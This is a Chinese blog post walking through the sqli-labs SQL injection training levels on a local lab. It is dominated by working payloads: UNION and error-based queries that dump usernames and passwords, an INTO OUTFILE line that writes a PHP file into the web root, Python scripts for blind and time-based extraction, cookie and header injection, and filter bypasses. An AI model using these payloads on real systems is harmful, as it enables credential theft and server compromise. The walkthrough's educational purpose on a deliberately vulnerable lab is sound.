sqli-labs闯关复现

已于 2024-08-08 17:21:20 修改
阅读量461 收藏 5
点赞数 4
文章标签: sql 数据库 mysql
于 2024-08-06 01:07:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_70638961/article/details/140937042
版权

目录

1.第一关:

尝试联表注入:

2.第五关:

3.第七关:主要考察outfile

4.第八关:对错都不回显,但是对就不显示,错就是you are in.....

5.第九关:没有任何反应,所以只能根据时间进行时间盲注,需要用到sleep()函数

6.第十一关:

7.第十五关

8.第十七关:报错注入。可以看到User Name的注入点被过滤了,所以就要通过Password注入

9.第十八关:User Name 和 Password都被过滤了

10.第二十关

11.第二十一关:

 12.第二十四关

1.第一关:

        

提示我们输入数字值得id,我们先输入

?id=1

有回显内容,说明我们已经进入了数据库进行查询。

尝试联表注入:

       第一步:首先我们需要知道一张表有几列,可以通过报错和正常回显来判断有几列。

这里两个知识点:

        1.正常使用mysql语句是无法查询出来的,由于是字符型,需要使用 ' 单引号来闭合,达到逃脱单引号的控制

        2.-- 空格是mysql的注释符,因为+加号是和空格编码成一样的%20,具体证明可以查看各大官方文档,例如华三。

?id=1'order by 3 --+

?id=1'order by 4 --+

这不难看出,这个表有三列。

        第二步:爆出表格的哪一列显示在页面。

?id=-1'union select 1,2,3--+

确定了显示的是2和3列

        第三步:就可以开始获取自己想要知道的内容了

?id=-1'union select 1,database(),version()--+

第四步:由于我们查出来了security这个数据库名,接下来就可以一步一步查出它的账号密码有哪些。先查出表名,在根据表名查出users的列名,最后就可以直接select查出账号密码。

select table_name from tables where table_schema='security';

select column_name from columns where table_schema='security' and table_name='users';

select username,password from security.users;

 

这是在数据库里面看到的表名和列名以及密码,但是我们需要通过注入在页面回显出来。

group_concat()的作用:将查询结果连起来。

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

 到这里第一关就结束。

2.第五关:

 由于第五关没有正确的回显,所以可以尝试一下进行报错注入。

?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3e,password)from users),1,32),0x7e),1)--+

注入成功,看到报错回显了账号密码,但是只有前32位,所以要以此类推知道全部回显出来。只需要吧1,32改成32,64.......

3.第七关:主要考察outfile
?id=1')) union select 1,2,"<?php phpinfo();" into outfile "C:/Study/phpstudy/phpstudy_pro/WWW/sqli-labs-master/web.php";--+

提示有语法错误不用担心,去看一下该路径下是否生成了php文件。

4.第八关:对错都不回显,但是对就不显示,错就是you are in.....

我们可以尝试一下:因为数据库名为security,第一个字母为s转换成ascii看看115是否正确。

?id=1' and ascii(substr(database(),1,2))=115--+

不难看出,这样是可以一直推出来的,但是需要尝试特别长的时间,所以我们可以选择爆破,或者用脚本跑出来。这是我使用简单的脚本:

import requests

url = 'http://127.0.0.1/sqli-labs-master/less-8/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        for j in range(32, 129):
            payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
            res = {"id": payload}
            r = requests.get(url, params=res)
            if "You are in..........." in r.text:
                name = name + chr(j)
                print(name)
                break
            else:
                continue

inject_database(url)

接下里只需要修改payload一步一步跑出来即可

"1' and ascii(substr((select group_concat(table_name)from information_schema.table where table_schema='security'), %d, 1)) > %d-- " % (i, mid)
5.第九关:没有任何反应,所以只能根据时间进行时间盲注,需要用到sleep()函数
import requests
import time


def process(length):
    result = ''
    for i in range(1, length + 1):
        for j in range(32, 126):
            start_time = time.time()
            response = requests.request('get', f"http://127.0.0.1/range/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(), {i}, 1))={j}, sleep({5}), 0)--+")
            process_time = time.time() - start_time
            if process_time > TIME:
                result += chr(j)
                print(result)
    return result


if __name__ == '__main__':
    TIME = 5
    process(8)

6.第十一关:

我们可以尝试一下在Username进行注入,由于这里不是地址栏,不会进行编码,所以就可以使用#,因为闭合的原因,所以Password可以随便输入。

1' union select 1,2#

可以发现确实是这样的,找到注入点,就和第一关差不多了

1' union select 1,group_concat(username ,id , password) from users#

7.第十五关

第十五关的思路其实跟第八关差不多,无非就是把You are in 换成图片flag.jpg,代码如下:

def inject_database(url):
    for i in range(1, 20):
        for j in range(32, 129):
            data = {"uname": "admin' and ascii(substr(database(), %d, 1)) = %d#)" % (i, j), "password": "111111"}
            r = requests.post(url, data=data)
            if "flag.jpg" in r.text:
                name = name + chr(j)
                print(name)
                break
            else:
                continue

inject_database(url)

当然,这个脚本其实是有点慢的,可以使用二分查找效率会相对高一些。

8.第十七关:报错注入。可以看到User Name的注入点被过滤了,所以就要通过Password注入

 

通过尝试password注入,发现是可以的,所以想法是正确的。

这里需要说一下在mysql5.6版本中,这个计数命令会报一个主键重复的错

select count(*),floor(rand(0)*2) x from users group by x;

所以需要把注入语句写成这样:

1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)as y)#

后面的就只需要改函数就行了。

9.第十八关:User Name 和 Password都被过滤了

所以我们需要找到新的注入点,通过代码发现可以尝试抓包一下看看能不能修改IP地址或者User-Agent。我是经过尝试后发现IP改了没用,User-Agent是可以的。

所以就可以开始注入了:

User-Agent:a' and updatexml(1,concat(0x7e,user(),0x7e), 1) and '1'='1

接下来就简单了和上面一样一步一步获取信息。

10.第二十关

可以看到登录成功后的回显是这样的,我们可以发现它把你的账号记录在了cookie中,我们就可以想象一下,突然加了这个会不会是一个新的注入点。

还是可以像18关一样抓个包看看。

Cookie:uname=admin' and updatexml(1,concat(0x7e,user(),0x7e),1)#

 发现确实可以,后面就和上面一样了

11.第二十一关:

其实第二十一关就是比二十关多了一个base64的编码,所以我们只需要吧注入语句转换成base64的编码进行注入就可以了。

12.第二十四关:二次注入

第24关多了忘记密码和注册功能,我们通过源代码可以发现输入密码的时候是进行了过滤的,无法进行注入,但是后面取的时候是没有进行过滤的,所以需要二次注入来实现,

第一步:先注册一个账号,并登录

进来之后就是这个界面,我们可以发现这里的修改密码就是源代码有漏洞的地方。所以我们可以在这里进行二次注入。

第二步:开始注入

我们发现这里的username处是可以闭合的,虽然后面用到了curr_pass,但是一个注释符就没用了,因为注入点在前面。

13.第二十五关:

源代码是对or和AND进行了过滤,但是仅仅是把or和AND替换成了空,所以就可以进行oorr,anandd注入

 ?id=1' aandnd updatexml(1,concat(0x7e,user(),0x7e),1)--+

但是这种方法放到现在是没有用的,任何waf都过不去。

14.第二十六关:

无非就是比25关多了几个过滤,所以用不了--+了,但是可以再用单引号进行闭合一样可以注入。

?id=1'||updatexml(1,concat(0x7e,user(),0x7e),1)aandnd'1'='1

 

网安知识系列:网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
weixin_54626591的博客
09-12 563
网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
网络安全与CTF学习信息汇总
墙角睡大觉的专栏
07-11 3152
http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍)http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0**********************************************************综合学习平台:http://edu.gooann.com/ 谷安...
sqli-libs闯关
weixin_43411799的博客
09-07 815
sqli-labs闯关less-1 文章目录sqli-labs闯关less-1sqli-libs简介 sqli-libs简介 sqli-lib是一个印度程序员写的,是用来学习SQL注入的闯关游戏,在本地搭建apache+mysql+php环境即可 ##系统函数 version() mysqls数据库版本 user() 数据库用户名 database()数据库名 @@datadir()数据库路径 @@version__compile_os操作系统版本 ##less-1 ####找注入点 我们可以在 ht
Sqli-Labs闯关——更新中
qq_18669681的博客
09-21 375
Sqli-Labs闯关Less-1 Less-1 正常访问: 一、判断 1 and 1=2 //访问正常,不是数值查询 1' //报错,可能为sql字符注入 1' --+//返回正常,所以为单引号字符注入 注: 1、我使用的是 --+来注释sql后面的语句,+的作用是,它在解析的时候会被解析为空格,用来隔开 --与后面语句。 2、#注释也是可行的,但在浏览器的url中,他是被用来指导...
sql的学习以及sqli-lab靶场练习
RealIiikun的博客
03-07 814
sqlilab的靶场练习
sqli-labs闯关笔记(Challenges)
末初 - mochu7
05-13 590
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs 文章目录Less-54Less-55Less-56Less-57Less-58Less-59Less-60Less-61Less-62Less-63Less-64Less-65 正文 Less-54 注入方法和第一关没啥区别,但是做了一个sql查询次数,在表中tryy每查询一次会+1,达到10次重置表名和字段名 但是10次好像没啥影响吧,把过程写一下: http://127.0.0.1/sqli.
sqli-labs闯关1-1
Darklord.W
06-30 534
sqli-labs闯关1-1 在线练习网址http://43.247.91.228:84/ 首先,进入sqli-labs 1-1 输入http://43.247.91.228:84/Less-1/?id=1 输入http://43.247.91.228:84/Less-1/?id=1’ 用and1=1和and1=2,结果显示它为字符型注入 http://43.247.91.228:84/Less-...
sqli-labs环境搭建及复现
m0_74344277的博客
09-06 1141
安装完后打开软件,开启nginx和mysql
sqli-labs第五关sql注入流程
qq_33598708的博客
03-30 5929
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相关的数据。 所以这关的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
网络安全与CTF在线学习资源网站
最新发布
Dasdwer的博客
08-08 1307
安全参考》http://www.douban.com/group/topic/72383272/ (2013年第一期--2015年第一期)全集。http://security.cs.rpi.edu/courses/binexp-spring2015/ bin 干货区。http://www.secbox.cn/hacker/tools/3552.html 法客论坛2015工具包-第三版。
sqli-labs闯关小游戏21-65.docx
10-23
这是个关于sql注入的文档,是sqli-labs闯关小游戏二十一关到六十五关的详解,每一关的步骤写得都很详细,前二十关的话我已经发布了博客,有需要的可以下载一下。
sqli-lib64关闯关笔记学习资料.zip
08-22
总结的64关笔记,有之前师傅写的,也有我写的,可以作为参考,只要是存到这里防止丢失,有喜欢的朋友可以一起下载看看,学习一下,我常用的环境是WAMP。
sql-labs 闯关
m0_73189964的博客
06-09 430
sql前22关靶场详解
【渗透测试】sqli-labs闯关(1-10)
qq_43168364的博客
04-20 585
第一关
sqli-labs闯关随记
weixin_44576725的博客
11-11 1597
前言:做了sqli-labs的接近三十关,在这里简单做个总结,以下是自己在闯关中所学到的知识,包括在网上查询、参考别人文章以及资料所理解到的。这个随记比较杂乱,都是我边学边写的,希望大家凑合着看哈。会不定时更新,如果后面内容较多,会考虑分为上下篇。 1、sql注入分类 基于从服务器接收到的响应: 基于错误的sql注入 联合查询的类型 堆查询注射 sql盲注: 基于布尔sql盲注 基于时间的sql盲注 基于报错的sql盲注 基于如何处理输入的sql查询(数据类型): 基于字符串 数字或证书为基础
sql-labs 闯关 5~10
qq_44663230的博客
08-14 2146
sql-labs 第5~10关 盲注系列
sqli-labs闯关----1-4关详解
weixin_43061418的博客
08-27 276
了解知识 数据库进行查库、查表、查字段、查字段信息的语句(此处以表security下的users为例) show databases;查看所有的数据库,等同于select schema_name from information_schema.schemata; show tables;同样也可以在information_schema中查看,select table_name from tables where table_schema=‘security’; 查users下的字段 select co
小白勇闯sqli-labs-master1-22关
weixin_56594114的博客
07-25 413
id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。输入admin') and 1=1 # 存在注入。输入正确的用户名密码,显示如下页面。
sqli-labs——保姆级1~22闯关详解
sGanYu
08-06 2441
目录 【Less-1】GET-Error based -Single quotes -String/错误的GET单引号字符串型注入 【Less-2】GET-Error based -intiger based/错误的GET数值型注入 【Less-3】GET-Error based -Single quotes with twist -String/错误的GET单引号变形括号型字符型注入 【Less-4】GET-Error based - Double Quotes - String/错误的GET双.
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值